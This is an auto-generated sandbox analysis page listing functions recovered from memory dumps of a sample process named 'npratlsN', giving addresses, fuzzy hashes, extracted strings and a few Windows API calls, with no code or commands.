Opcode Fuzzy Hash: dab80846efe69fb3d2e1a7522b1ccc936219a26adf463aeb4249f62b8bc14797
Instruction Fuzzy Hash: DB01FC31704218AFCF06AE689810ADE3FBBDFC9B50B15806EF505CB290DB35DC1587A4

Function 1F901B09 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4b97e43758a78a648f31ce5cc2c1bb9785dcaeec049d571176fb240c277ffc
Instruction ID: e701c2178cd6ab7f70e0690a289f3d865d771516b00bf770ae0a86594fa59da5
Opcode Fuzzy Hash: 2b4b97e43758a78a648f31ce5cc2c1bb9785dcaeec049d571176fb240c277ffc
Instruction Fuzzy Hash: 821118B5D1421E8FCF01EFA8D8844EEBBB5FF4A310F10026AD459B7254EB315A55CBA1

Function 20A8DC40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864442464.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a80000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 395cb604cd8ae92015b7df6b6a3055cf039fd5c23d6c512502cf76cd575e3ecc
Instruction ID: ca50efba4ed9ca5bfe26e1056d9ccab67d93b9dca53f69ba24bc6f0427e273dc
Opcode Fuzzy Hash: 395cb604cd8ae92015b7df6b6a3055cf039fd5c23d6c512502cf76cd575e3ecc
Instruction Fuzzy Hash: 70018CB6F102248FC754EFB8C448A9A7BF4BF48651B2105A8E809D7311DA71DE01CB91

Function 1F9084F7 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 178ac1d58a0fbd5b1597cfa2ac62d0611bd236b5f873c79b067c4d580f75f154
Instruction ID: 4498446eddcd43705c3f64154386e76033a0c46eb12ca38d6dbc284537f00f5a
Opcode Fuzzy Hash: 178ac1d58a0fbd5b1597cfa2ac62d0611bd236b5f873c79b067c4d580f75f154
Instruction Fuzzy Hash: 6A115170A10228DBDB15EF64D954B9E7BB9BF85740F10446DE441AB384DF36A841CB90

Function 209D7723 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a7601cc4659a6cecde1544c7cfa64895d096242e552cf11c4070b68ae62d46d
Instruction ID: a354adeb248ce93edb300b0e8d28c855d3a655f958f3c4f1779f5368665c0a59
Opcode Fuzzy Hash: 4a7601cc4659a6cecde1544c7cfa64895d096242e552cf11c4070b68ae62d46d
Instruction Fuzzy Hash: 7201A22630E3D45FCF071B7448255AD7F62AF8662030484D7E941CB2A3CE394C5AD366

Function 1F90D3F1 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c9de2ed2ace1644ee112c00538195f4d39d53c504a55f24b84badfabb6a54e1
Instruction ID: f9d8776e2ff5a8af1d661a69a41a6fe114db17a0fa21dab703abe9e5f22cdef7
Opcode Fuzzy Hash: 3c9de2ed2ace1644ee112c00538195f4d39d53c504a55f24b84badfabb6a54e1
Instruction Fuzzy Hash: A311CCB4D00259EFCB02DFA4C4C0AAEBFB0FB4A305F1041A9D916A3390C7356A06CFA1

Function 1C67D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3847598686.000000001C67D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C67D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c67d000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20413d62f356348a93c39fcc44c5b85a821a19c5cfea36945b97c22a9d113b01
Instruction ID: c5a58d97cddf34b613ed484a00e8bcbbcd6a4e1b9a46a3bdc4b88359fc1cf44e
Opcode Fuzzy Hash: 20413d62f356348a93c39fcc44c5b85a821a19c5cfea36945b97c22a9d113b01
Instruction Fuzzy Hash: 0301DB724053449AE7104F25CDC8B57BFD8DF61364F18DD5AED484B242D6799841C7B2

Function 1C67D006 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3847598686.000000001C67D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C67D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c67d000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9bcf58466ad7d1c0cd655e88a6543cff4a6d2f24310c67fd1c817d71b8c4c30
Instruction ID: 7d7024ce5e0388ffdb6ae3c164c72adfdbbd5f6e42deb4fab4575516ee8ad9b4
Opcode Fuzzy Hash: d9bcf58466ad7d1c0cd655e88a6543cff4a6d2f24310c67fd1c817d71b8c4c30
Instruction Fuzzy Hash: 0601217240E3C09FE7128B258D94B56BFB4DF53224F19C5DBD9888F2A3C2695849C772

Function 1F909A70 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 343803a87f9727487abd35c4dbab908d3a32bf5f5e342df6951e4be23722e590
Instruction ID: 04f684ef527be295d850e9a5115dacd1137e6142086f72d72eb1d358088b12d6
Opcode Fuzzy Hash: 343803a87f9727487abd35c4dbab908d3a32bf5f5e342df6951e4be23722e590
Instruction Fuzzy Hash: 9EF096323005154F87477A3E8454A6E77EEEFC5B61356407DE907CB3A1EE60EC028790

Function 20A8D6DB Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864442464.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a80000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf5086d86a0ef137c6671eade876386c55d296e4ea283075ff4e135364146659
Instruction ID: 177250ce746f9ebfb81b13ab26e83c4a96f70ae219a11221ed2b74a83822f9c9
Opcode Fuzzy Hash: cf5086d86a0ef137c6671eade876386c55d296e4ea283075ff4e135364146659
Instruction Fuzzy Hash: 6001F4353182904FD705AB39D854D567FBAFFC6611B0544EAE009CF263DB60DC06C790

Function 20A8DBB8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864442464.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a80000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ce358613c5af28e99e2fa92fa072cec248f906f28dc324893655e5aa7c1eb17
Instruction ID: 5896f6c53781f5f4dd94a521f034e8d4966c25837d54a0bbac8bc0aa16d9d142
Opcode Fuzzy Hash: 7ce358613c5af28e99e2fa92fa072cec248f906f28dc324893655e5aa7c1eb17
Instruction Fuzzy Hash: 3E01B6B0E002299FCF44EFB9C9456AEBBF5BF88200F50856AD419E7254E7785901DBA0

Function 209D776F Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7305cce4c3277f2ba4d7eae6d2c4307ba3e7b6f10fde2286c7062ea76ecb7d57
Instruction ID: 69883c0d9d366787f76a9c488329dcebb736ce4f3251e7a17b61c6b7a01c003b
Opcode Fuzzy Hash: 7305cce4c3277f2ba4d7eae6d2c4307ba3e7b6f10fde2286c7062ea76ecb7d57
Instruction Fuzzy Hash: F5F089767002186FCF055ED89C459EF7BABEBC8360B408429FA15C7350DA32581597B5

Function 209D7770 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f66cdd85e614520e296d855f2a1cf652d7c527f73cded238dff35957ef3627af
Instruction ID: c88e0e838e23309996ecefc0abd5d6e1278672faf19e724f9d3e42ef6ee9d529
Opcode Fuzzy Hash: f66cdd85e614520e296d855f2a1cf652d7c527f73cded238dff35957ef3627af
Instruction Fuzzy Hash: 8CF089767002186FCF055ED89C449EF7BABEBC8260B408429FA15C7350DA32581597B5

Function 20A8D700 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864442464.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a80000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaa35fa6cf276e3cb6e1dddd463a116779315d85d01ac46b066823e990491a54
Instruction ID: bd2de8b20db8a5d89117322e3966cae6722026cb567f2645d9cc0ef6accc27e8
Opcode Fuzzy Hash: eaa35fa6cf276e3cb6e1dddd463a116779315d85d01ac46b066823e990491a54
Instruction Fuzzy Hash: 78F037393002148FD708AB7AD894E6A77BBFFC5A117158069E505CB361DE71DC01C790

Function 1F908ABF Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa35389fbd53f0bc2421ea1c3c85728277a5f7d11f3ed28f212e9794fd1fe81
Instruction ID: 010f14d0c9db8583d67c9ab2c03d7c9e5590f61f1debb6c5af8715482fbad69c
Opcode Fuzzy Hash: 9fa35389fbd53f0bc2421ea1c3c85728277a5f7d11f3ed28f212e9794fd1fe81
Instruction Fuzzy Hash: BDF03075A00218AFCB50EF6AD848AAEBBE9EB88330F008076E918C7250D77199518B91

Function 1F909A60 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa20c535cd43178a2f280c5fc0fbd49dbe07f647e9e3dcdc3db2f48a552f187a
Instruction ID: 0c20e8f9eb2c3ec052de7d1c49f248354cd636953ad6e97c48642400f5325a3e
Opcode Fuzzy Hash: fa20c535cd43178a2f280c5fc0fbd49dbe07f647e9e3dcdc3db2f48a552f187a
Instruction Fuzzy Hash: 77E0263730D3A01B831331791850052BF2CCAC267035A01BFE99ECB783D816880543B1

Function 1F9055AF Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 652ded7659f3fed48bc0b08fb3bc31b078c850785863345df0581bcccf9fdd2a
Instruction ID: 91ca866f954cb5bd1c9a7eb1e5ae007eac1b562fb7994bb21d7041fbae6a559d
Opcode Fuzzy Hash: 652ded7659f3fed48bc0b08fb3bc31b078c850785863345df0581bcccf9fdd2a
Instruction Fuzzy Hash: 36E0867006A3858FC3879F7488852843F36DF4160031599F5D4449B692DB79184FD762

Function 1F907D87 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d934e30c08e8d3c291783562cb8630960351e8820e9f36aee3b0961c244c2b24
Instruction ID: 041804ec23e83febcdc3befd100640268466791665e6f983858edcc885decd67
Opcode Fuzzy Hash: d934e30c08e8d3c291783562cb8630960351e8820e9f36aee3b0961c244c2b24
Instruction Fuzzy Hash: 3CC0123320E1283AA266305E7C41EEBAA8CD3C13B6A21023BF91C872809842AC8001A6

Function 1F901B18 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4674ce5aa40e7d340776eff99b83bb73658092ee6e6512f6ad8822a8e291902b
Instruction ID: 2be7e9a532f9ddf656837a3c96b66edeb62f39ef54a242ce2bd4e50450fd548f
Opcode Fuzzy Hash: 4674ce5aa40e7d340776eff99b83bb73658092ee6e6512f6ad8822a8e291902b
Instruction Fuzzy Hash: 10D02B31D2022F83CF04E7A5DC004DFF738EEC2260B514622D41033000FB302658C2E0

Function 1F909E3D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86dc04a3b984fcbec35b734d1c8da49ecd401bbeb52ab00802553dc260c60722
Instruction ID: c790679213e4e06b4b708c65823aa9b898f00cdde643e396cef836465c0b8d11
Opcode Fuzzy Hash: 86dc04a3b984fcbec35b734d1c8da49ecd401bbeb52ab00802553dc260c60722
Instruction Fuzzy Hash: B6D0677BB40018DFCB059F9CE880CDDF776FB98221B148116EA15E3261C6319925DB50

Function 1F9055C0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cedceceb75457ed0f008bb4f1ed4add712180b2dc2c821e47b000498d74f4db2
Instruction ID: 3b36c35508966cb8ca3acd08ad2024cbee2df8af95ca20747ca338cb6c5bf88c
Opcode Fuzzy Hash: cedceceb75457ed0f008bb4f1ed4add712180b2dc2c821e47b000498d74f4db2
Instruction Fuzzy Hash: 58C022B001030CC7C605EB68C8C1A08333AE780A00710EDA0F0051B600CF742889C2BA

Function 1F9089C0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 393633ef5ce0f738c13da57da14ac030c3db0ea6b3829b37ea16ee5a62376639
Instruction ID: a0efaea2d37f0b7744767358d212e59821d6671473140c5de0d4328d7cc958ee
Opcode Fuzzy Hash: 393633ef5ce0f738c13da57da14ac030c3db0ea6b3829b37ea16ee5a62376639
Instruction Fuzzy Hash: 15C08035F04104CBCB00EEA4E4455DDF730DB84331F10007AD51577641C635CA658752

Non-executed Functions

Function 20A8F108 Relevance: 23.0, Strings: 18, Instructions: 461COMMON

Download Yara Rule

Strings

PHsq, xrefs: 20A8F62E
LjVp, xrefs: 20A8F3BB
", xrefs: 20A8F8DE
PHsq, xrefs: 20A8F54D
LjVp, xrefs: 20A8F5A8
PHsq, xrefs: 20A8F73D
PHsq, xrefs: 20A8F642
LjVp, xrefs: 20A8F4B3
LjVp, xrefs: 20A8F3D1
PHsq, xrefs: 20A8F455
LjVp, xrefs: 20A8F6B6
LjVp, xrefs: 20A8F4C9
0oVp, xrefs: 20A8F257
LjVp, xrefs: 20A8F6A0
LjVp, xrefs: 20A8F5BE
PHsq, xrefs: 20A8F729
PHsq, xrefs: 20A8F539
PHsq, xrefs: 20A8F441

Memory Dump Source

Source File: 0000000D.00000002.3864442464.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a80000_npratlsN.jbxd

Similarity

API ID:
String ID: "$0oVp$LjVp$LjVp$LjVp$LjVp$LjVp$LjVp$LjVp$LjVp$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq
API String ID: 0-1005420056
Opcode ID: 4d2f77d915993db53761c0e89543826bad9dd9e2c00623fec6e8a621a73463d7
Instruction ID: a5141f422db35983fff655092c6ef445301678d0507e126be4386b62382991c9
Opcode Fuzzy Hash: 4d2f77d915993db53761c0e89543826bad9dd9e2c00623fec6e8a621a73463d7
Instruction Fuzzy Hash: 5F3290B4E00228CFDB58CFA5C984B9DBBB2BF89304F2085A9D509AB351DB755E85DF10

Function 20A8F0F8 Relevance: 12.9, Strings: 10, Instructions: 367COMMON

Download Yara Rule

Strings

0oVp, xrefs: 20A8F257
PHsq, xrefs: 20A8F62E
PHsq, xrefs: 20A8F729
", xrefs: 20A8F8DE
PHsq, xrefs: 20A8F54D
PHsq, xrefs: 20A8F73D
PHsq, xrefs: 20A8F642
PHsq, xrefs: 20A8F539
PHsq, xrefs: 20A8F441
PHsq, xrefs: 20A8F455

Memory Dump Source

Source File: 0000000D.00000002.3864442464.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a80000_npratlsN.jbxd

Similarity

API ID:
String ID: "$0oVp$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq
API String ID: 0-3484915524
Opcode ID: fca5872b675547dfff76b7f411c9b58aea80115929ad64e34ff5bc4467695a73
Instruction ID: 87f360b74c92ce97c3c82242d3bda5c3afeb561d2d0187a3b0038e999d51f83d
Opcode Fuzzy Hash: fca5872b675547dfff76b7f411c9b58aea80115929ad64e34ff5bc4467695a73
Instruction Fuzzy Hash: E70280B4E002188FDB58CFA5C984BDDBBB2BF89300F2085A9D509AB361DB755E85DF10

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 0000000D.00000002.3820648625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3820648625.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3820648625.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 0000000D.00000002.3820648625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3820648625.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3820648625.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6

Memory Dump Source

Source File: 0000000D.00000002.3820648625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3820648625.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3820648625.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569

Function 20A8FAD8 Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

0oVp, xrefs: 20A8FB43

Memory Dump Source

Source File: 0000000D.00000002.3864442464.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a80000_npratlsN.jbxd

Similarity

API ID:
String ID: 0oVp
API String ID: 0-771760206
Opcode ID: 932a5db4796cd928e75652a006da68373cbfea863fc1f7cf614be3b9edb655dc
Instruction ID: a0d64736e3a6425331f4a1e68333843eedaf45d4e3c0c12226f58d3c4039938a
Opcode Fuzzy Hash: 932a5db4796cd928e75652a006da68373cbfea863fc1f7cf614be3b9edb655dc
Instruction Fuzzy Hash: 8CB17474E10218CFDB54DFA9C994A9DBBB2FF89310F2081A9D919AB365DB30AD41CF50

Function 20A8FAB5 Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

0oVp, xrefs: 20A8FB43

Memory Dump Source

Source File: 0000000D.00000002.3864442464.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a80000_npratlsN.jbxd

Similarity

API ID:
String ID: 0oVp
API String ID: 0-771760206
Opcode ID: 4a9b34e916b4c4458ce726fedbb68b6cd0ea7bd503029a1f1bd93947402914b1
Instruction ID: 14238da045d404dad702555bb19cc02d9000af1fb8742e78e9ab1c167a5448d6
Opcode Fuzzy Hash: 4a9b34e916b4c4458ce726fedbb68b6cd0ea7bd503029a1f1bd93947402914b1
Instruction Fuzzy Hash: C551C474E01648CFDB08CFAAC594A9DBBF2BF89310F248169D818AB365DB749942CF14

Function 1F90E5E8 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16734c8c95ebf56554848502363bc5791de90d740b4012c0c53126edcd622085
Instruction ID: 50474baaa5227db953f61b819dd2f38e50731adeb624d2012559ab6bbffd2340
Opcode Fuzzy Hash: 16734c8c95ebf56554848502363bc5791de90d740b4012c0c53126edcd622085
Instruction Fuzzy Hash: 5552AC74E01228CFDB65DFA9C984BDDBBB2BB89301F1085E9D409A7250DB35AE85CF50

Function 20A4BDA0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864127224.0000000020A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a40000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebb0e24e1142983ffa5dd6fbfca6d39a432fe859923a29d2d2b5ddac8a771fbf
Instruction ID: d828e7956187b69b0c7adc41f74c111af219f0ea070f9a3c95e4e9f0667109af
Opcode Fuzzy Hash: ebb0e24e1142983ffa5dd6fbfca6d39a432fe859923a29d2d2b5ddac8a771fbf
Instruction Fuzzy Hash: 02D1AE78E00228CFDB54DFA5C984B9DBBB2BF89340F6081A9D509AB394DB355E85CF50

Function 20A4E8A8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864127224.0000000020A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a40000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0b5ba2fc9a45259bf6738240528823c2ca062055fa0246078929e713abcef53
Instruction ID: bae4eb99d85b687f13afbdc8a7cfe7845d0cfa0d58fd8e3e80d677c1aaff7d48
Opcode Fuzzy Hash: e0b5ba2fc9a45259bf6738240528823c2ca062055fa0246078929e713abcef53
Instruction Fuzzy Hash: 95D1AF78E00228CFDB14DFA5C994B9DBBB2BF89340F6081A9D409AB394DB355E85CF51

Function 20A47AB0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864127224.0000000020A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a40000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 194779b26d0731315b7697b95ecf05aaa0ce2a2fcae8a6aa4908f639c8affb5e
Instruction ID: 7c8bbd6c832d67470d4c5560e6c00b78333edf4ef2ba1ee8c330a61691684c55
Opcode Fuzzy Hash: 194779b26d0731315b7697b95ecf05aaa0ce2a2fcae8a6aa4908f639c8affb5e
Instruction Fuzzy Hash: BDD18E74E00228CFDB14DFA5C994BADBBB2BF89340F6081A9D509AB394DB355E85CF50

Function 20A4A5B8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864127224.0000000020A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a40000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f82a23ac2eb25d414f4488fe651e94bf20ac50abf3c0475375ce4b462ae61ee6
Instruction ID: f6b38c36a78e43042b541466c83d1a86623b92c66caa8268f1f21386b9453dc0
Opcode Fuzzy Hash: f82a23ac2eb25d414f4488fe651e94bf20ac50abf3c0475375ce4b462ae61ee6
Instruction Fuzzy Hash: D6D1AE78E00228CFDB14DFA5C994B9DBBB2BF89340F6081A9D409AB394DB355E85DF50

Function 20A4AA80 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864127224.0000000020A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a40000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
